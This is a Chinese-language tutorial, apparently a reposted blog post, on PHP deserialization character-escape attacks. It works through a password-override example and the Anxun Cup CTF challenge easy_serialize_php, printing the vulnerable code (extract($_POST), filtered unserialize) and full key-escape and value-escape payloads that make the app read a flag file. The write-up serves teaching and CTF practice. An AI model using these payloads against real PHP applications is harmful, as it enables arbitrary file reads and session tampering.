PHP反序列化字符逃逸

反序列化的特点

PHP 在反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾(字符串除外),并且是根据长度判断内容的。

在php中,反序列化的过程中必须严格按照序列化规则才能成功实现反序列化,例如:

<?php
$str='a:2:{i:0;s:8:"hahahaha";i:1;s:5:"aaaaa";}';
var_dump(unserialize($str));

输出结果:

array(2) { 
    [0]=> string(8) "hahahaha" 
    [1]=> string(5) "aaaaa" 
}

一般我们会认为,只要增加或去除$str的任何一个字符都会导致反序列化的失败。
但是事实并非如此,如果我们在$str结尾的花括号后再增加一些字符呢?例如:

<?php
$str='a:2:{i:0;s:8:"Hed9eh0g";i:1;s:5:"aaaaa";}abc';
var_dump(unserialize($str));

仍然可以输出上面的结果,这说明反序列化的过程是有一定识别范围的,在这个范围之外的字符都会被忽略,不影响反序列化的正常进行。

举个栗子

字符逃逸:

<?php
$_SESSION["user"]='flagflagflagflagflagflag'$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';
echo serialize($_SESSION);

结果为

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

假设后台存在一个过滤机制,会将含flag字符替换为空,那么以上反序列化字符串的过滤结果为:

a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

那么将这串字符串序列化会得到什么?

这个时候关注第二个s所对应的数字,本来由于有6个flag字符所以为24,现在这6个flag都被过滤了,那么它将会尝试向后读取24个字符看看是否满足序列化的规则,也即读取“;s:8:”function”;s:59:”a,读取这24个字符后以”;结尾,恰好满足规则,而后第三个s向后读取img的20个字符,第四个、第五个s向后读取均满足规则,所以序列化结果为:

array(3) { 
["user"]=> string(24) "";s:8:"function";s:59:"a" 
["img"]=> string(20) "ZDBnM19mMWFnLnBocA==" 
["dd"]=> string(1) "a" 
}

写成数组形式也即:

$_SESSION["user"]='";s:8:"function";s:59:"a';
$_SESSION["img"]='ZDBnM19mMWFnLnBocA==';
$_SESSION["dd"]='a';

可以发现。SESSION数组的键值img对应的值发生了改变。

设想,如果我们能够你控制原来SESSION数组的function值但是无法控制img的值,我们就可以通过这种方式间接控制到img对应的值。

反序列化字符逃逸

反序列化的字符逃逸问题根据过滤函数一般分为两种。

关键词数增加

这种情况比较好构造,直接构造多个关键词,这样就能逃出几个字符。

还是看个栗子,如果将x替换为yy,如何去修改密码

<?php
function filter($string){
    return str_replace('x','yy',$string);
}

$username = "silkage";
$password = "aaaaa";
$user = array($username, $password);

var_dump(serialize($user));
echo '
';

$r = filter(serialize($user));

var_dump($r);
echo '
';

var_dump(unserialize($r));

假设我们想要把密码修改为123456,如何实现呢?

我们来分析一下:

首先,正常序列化的结果为

a:2:{i:0;s:6:"silkage";i:1;s:5:"aaaaa";}

那如果把username换成silkagexxx,其处理后的序列化结果为。

a:2:{i:0;s:9:"silkageyyyyyy";i:1;s:5:"aaaaa";}

因为比以前多了3个字符,这个时候肯定是序列化失败的

想一下,它在进行修改密码成功之后应该是这样的

a:2:{i:0;s:6:"silkage";i:1;s:6:"123456";}i:1;s:5:"aaaaa";}

可以看到需要添加的字符串为20个字符

";i:1;s:6:"123456";}

silkage为6个字符,因为是x=>yy,字符长度由1=>2,那么我们这里设定填充为z,需要满足

6+z+20 = 6 + 2z    ==> z=20
//silkage长度+填充数量+逃逸字符长度 =  silkage长度 + 2倍填充长度

所以填充20个x即可。

"a:2:{i:0;s:46:"silkageyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy";i:1;s:6:"123456";}";i:1;s:5:"aaaaa";}"

array(2) {
  [0] =>
  string(46) "silkageyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy"
  [1] =>
  string(6) "123456"
}

关键词数减少

这里以安洵杯easy_serialize_php为例

代码如下

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

flag 在 d0g3_f1ag.php 这个文件中

$_SESSION 数组中有 user, funciton, img 这三个属性

最后读文件的文件名是 $_SESSION['img'] ,如果能够控制这个属性就好了,但是

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

img的值我们是控制不了的,进而无法读取到目标文件。

但序列化之后经过了一次过滤

extract($_POST); 使得我们可以控制 $_SESSION 数组中的 user 和 function

那我们就可以构造payload读取文件了。

键逃逸

payload:

_SESSION[phpflag]=;s:7:"xxxxxxx";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

那么经过后端处理就会变成:

"a:2:{
s:7:"";s:48:";s:1:"1";
s:3:"img";s:20:"ZDBnM19mbGxsbGxsYWc=";}" //结束
;s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"

这里为了方便加了换行和注释,实际上是不应该有的。

这的s:7:""之所以为空,是因为故意构造了phpflag这个字符串,经过过滤函数后被替换为空,从而吃掉了一部分值。然后剩下的值充当另一个对象逃逸出去。

值逃逸

payload:

这儿需要两个连续的键值对,由第一个的值覆盖第二个的键,这样第二个值就逃逸出去,单独作为一个键值对

 
_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}&function=show_image

后端处理就会变成:

"a:3{
s:4:"user";s:24:"";s:8:"function";s:59:"a";
s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";
s:2:"dd";s:1:"a";}"  //结束
;s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"

同样,也是加了换行和注释。

总结

总之,就是两种方法,第一种通过构造会过滤的值来吃掉字符数量,造成逃逸。第二种就是构造值逃逸。

 

 

原文地址:https://www.cnblogs.com/Silkage/p/13232305.html